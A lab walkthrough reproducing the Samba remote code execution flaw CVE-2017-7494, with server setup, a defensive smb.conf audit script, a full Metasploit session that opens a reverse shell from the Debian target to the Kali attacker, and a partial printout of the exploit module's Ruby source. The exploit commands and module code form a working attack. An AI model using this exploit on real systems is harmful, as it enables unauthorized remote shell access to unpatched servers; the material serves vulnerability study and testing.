A Worked Example of the Samba Remote Code Execution Vulnerability

Samba is the software that implements the SMB protocol on Linux and Unix systems.

On 24 May 2017 Samba released version 4.6.4, which fixed a serious remote code execution vulnerability, CVE-2017-7494. The vulnerability affects all Samba versions from 3.5.0 up to 4.6.4/4.5.10/4.4.14.

360 Network Security Center and the Gear Team of 360's Information Security Department analysed the vulnerability as soon as it was disclosed and confirmed that it is critical and allows remote code execution.

Vulnerability summary

CVE ID: CVE-2017-7494

Severity: Critical

Affected versions: Samba 3.5.0 and all versions up to 4.6.4/4.5.10/4.4.14

Description: On 24 May 2017 Samba released version 4.6.4, fixing a serious remote code execution vulnerability that affects all Samba versions from 3.5.0 up to 4.6.4/4.5.10/4.4.14.

Technical analysis

As the official advisory describes, the vulnerability only requires a Samba user with write access to a share in order to escalate to root privileges on the server running Samba (Samba runs as root by default).

I. Setting up the reproduction environment

Set up two virtual machines, one Debian and one Kali. Attacker: Kali (192.168.217.162); target: Debian (192.168.217.150).

II. Install and configure Samba on Debian

1. First, install the Samba server:

# apt-get install samba

2. Create a shared directory on Debian; here I use /mnt/shared:

# mkdir /mnt/shared

3. Edit the Samba configuration file /etc/samba/smb.conf and append the following at the end:

[shared]
    comment = 'Share for work'
    path = /mnt/shared
    guest ok = yes
    public = yes
    writable = yes
    create mask = 0777

4. Set the permissions on /mnt/shared:

# chmod -R 777 /mnt/shared

5. Restart the Samba service:

# /etc/init.d/samba restart
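The stanza appended in step 3 is exactly the precondition the exploit needs: an anonymous client can write to the share. As an added example that is not part of the original article, the Python below audits an smb.conf for guest-writable shares and for the upstream workaround for CVE-2017-7494, `nt pipe support = no` in [global]; the configuration it checks is constructed from the article's [shared] stanza, and the parser is a deliberately minimal one written for this example.

```python
# Constructed sample: the article's [shared] stanza appended to a bare [global].
SAMPLE_CONF = """[global]
    workgroup = WORKGROUP
[shared]
    comment = 'Share for work'
    path = /mnt/shared
    guest ok = yes
    public = yes
    writable = yes
    create mask = 0777
"""


def parse_smb_conf(text):
    """Minimal smb.conf reader: {section: {key: value}} with lower-cased names.
    Handles '#'/';' comments and 'key = value' lines; no include or %-variable expansion."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            conf.setdefault(section, {})
        elif "=" in line and section is not None:
            key, val = line.split("=", 1)
            conf[section][key.strip().lower()] = val.strip()
    return conf


def audit_smb_conf(text):
    """Findings relevant to CVE-2017-7494: shares an anonymous client can write to
    (the precondition the lab above relies on) and a [global] without the upstream
    workaround 'nt pipe support = no' (which also disables some Windows client features)."""
    conf = parse_smb_conf(text)

    def yes(opts, key):
        return opts.get(key, "").lower() in ("yes", "true", "1")

    findings = []
    for name, opts in conf.items():
        if name == "global":
            continue
        # 'public' is a synonym of 'guest ok'; 'writeable' and 'read only = no' of 'writable'.
        guest = yes(opts, "guest ok") or yes(opts, "public")
        writable = (yes(opts, "writable") or yes(opts, "writeable")
                    or opts.get("read only", "").lower() == "no")
        if guest and writable:
            findings.append("[%s] is guest-writable (path %s)" % (name, opts.get("path", "?")))
    if conf.get("global", {}).get("nt pipe support", "yes").lower() != "no":
        findings.append("[global] lacks 'nt pipe support = no'")
    return findings
```

Running `audit_smb_conf(SAMPLE_CONF)` reports both the guest-writable [shared] share and the missing workaround; a patched server with the share set read-only reports nothing.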

III. Set up the Kali attacker machine

Open a terminal on Kali, change to the linux folder under Metasploit's exploit modules directory, create a new smb folder and place the exploit script in it:

# cd /usr/share/metasploit-framework/modules/exploits/linux
# mkdir smb
# wget

Start Metasploit and run the attack (I renamed the exploit script to cve-2017-7494.rb):

# msfconsole
msf > use exploit/linux/smb/cve-2017-7494
msf exploit(cve-2017-7494) > set rhost 192.168.217.150
rhost => 192.168.217.150
msf exploit(cve-2017-7494) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf exploit(cve-2017-7494) > set lhost 192.168.217.162
rhost => 192.168.217.162
msf exploit(cve-2017-7494) > run
[*] Started reverse TCP handler on 192.168.217.162:4444
[*] 192.168.217.150:445 - Using location \\192.168.217.150\shared for the path
[*] 192.168.217.150:445 - Payload is stored in //192.168.217.150/shared/ as WzyvkESS.so
[*] 192.168.217.150:445 - Trying location /volume1/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume1/shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume1/SHARED/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume1/Shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume2/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume2/shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume2/SHARED/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume2/Shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume3/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume3/shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume3/SHARED/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /volume3/Shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /shared/shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /shared/SHARED/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /shared/Shared/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /mnt/WzyvkESS.so...
[*] 192.168.217.150:445 - Trying location /mnt/shared/WzyvkESS.so...
[*] Sending stage (38 bytes) to 192.168.217.150
[*] Command shell session 2 opened (192.168.217.162:4444 -> 192.168.217.150:56540) at 2017-05-26 01:17:48 -0400

id
uid=65534(nobody) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)

ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:6e:9a:4a
          inet addr:192.168.217.150  Bcast:192.168.217.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe6e:9a4a/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:6769 errors:0 dropped:0 overruns:0 frame:0
          TX packets:700 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:479898 (468.6 KiB)  TX bytes:102796 (100.3 KiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:35 errors:0 dropped:0 overruns:0 frame:0
          TX packets:35 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:3557 (3.4 KiB)  TX bytes:3557 (3.4 KiB)

whoami
nobody

POC:

##
# This module requires Metasploit:
# Current source:
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Samba is_known_pipename() Arbitrary Module Load',
      'Description'    => %q{
          This module triggers an arbitrary shared library load vulnerability
        in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module
        requires valid credentials, a writeable folder in an accessible share,
        and knowledge of the server-side path of the writeable folder. In
        some cases, anonymous access combined with common filesystem locations
        can be used to automatically exploit this vulnerability.
      },
      'Author'         =>
        [
          'steelo <knownsteelo[at]gmail.com>',    # Vulnerability Discovery
          'hdm',                                  # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2017-7494' ],
          [ 'URL', '' ],
        ],
      'Payload'         =>
        {
          'Space'       => 9000,
          'DisableNops' => true
        },
      'Platform'        => 'linux',
      #
      # Targets are currently limited by platforms with ELF-SO payload wrappers
      #
      'Targets'         =>
        [
          [ 'Linux ARM (LE)',   { 'Arch' => ARCH_ARMLE } ],
          [ 'Linux x86',        { 'Arch' => ARCH_X86 } ],
          [ 'Linux x86_64',     { 'Arch' => ARCH_X64 } ],
        # [ 'Linux MIPS',       { 'Arch' => MIPS } ],
        ],
      'Privileged'      => true,
      'DisclosureDate'  => 'Mar 24 2017',
      'DefaultTarget'   => 2))

    register_options(
      [
        OptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']),
        OptString.new('SMB_SHARE_BASE', [false, 'The remote filesystem path correlating with the SMB share name']),
        OptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']),
      ])
  end


  def generate_common_locations
    candidates = []
    if datastore['SMB_SHARE_BASE'].to_s.length > 0
      candidates << datastore['SMB_SHARE_BASE']
    end

    %W{/volume1 /volume2 /volume3 /shared /mnt /mnt/usb /media /mnt/media /var/samba /tmp /home /home/shared}.each do |base_name|
      candidates << base_name
      candidates << [base_name, @share]
      candidates << [base_name, @share.downcase]
      candidates << [base_name, @share.upcase]
      candidates << [base_name, @share.capitalize]
      candidates << [base_name, @share.gsub(" ", "_")]
    end

    candidates.uniq
  end

  def enumerate_directories(share)
    begin
      self.simple.connect("\\\\#{rhost}\\#{share}")
      stuff = self.simple.client.find_first("*")
      directories = [""]
      stuff.each_pair do |entry,entry_attr|
        next if %W{. ..}.include?(entry)
        next unless entry_attr['type'] == 'D'
        directories << entry
      end
      return directories
    rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
      vprint_error("Enum #{share}: #{e}")
      return nil

    ensure
      if self.simple.shares["\\\\#{rhost}\\#{share}"]
        self.simple.disconnect("\\\\#{rhost}\\#{share}")
      end
    end
  end

  def verify_writeable_directory(share, directory="")
    begin
      self.simple.connect("\\\\#{rhost}\\#{share}")

      random_filename = Rex::Text.rand_text_alpha(5)+".txt"
      filename = directory.length == 0 ? "#{random_filename}" : "#{directory}\\#{random_filename}"

      wfd = simple.open(filename, 'rwct')
      wfd << Rex::Text.rand_text_alpha(8)
      wfd.close
      simple.delete(filename)
      return true
    rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
      vprint_error("Write #{share}\\#{filename}: #{e}")
      return false

    ensure
      if self.simple.shares["\\\\#{rhost}\\#{share}"]
        self.simple.disconnect("\\\\#{rhost}\\#{share}")
      end
    end
  end

  def share_type(val)
    [ 'DISK', 'PRINTER', 'DEVICE', 'IPC', 'SPECIAL', 'TEMPORARY' ][val]
  end

  def enumerate_shares_lanman
    shares = []
    begin
      res = self.simple.client.trans(
        "\\PIPE\\LANMAN",
        (
          [0x00].pack('v') +
          "WrLeh
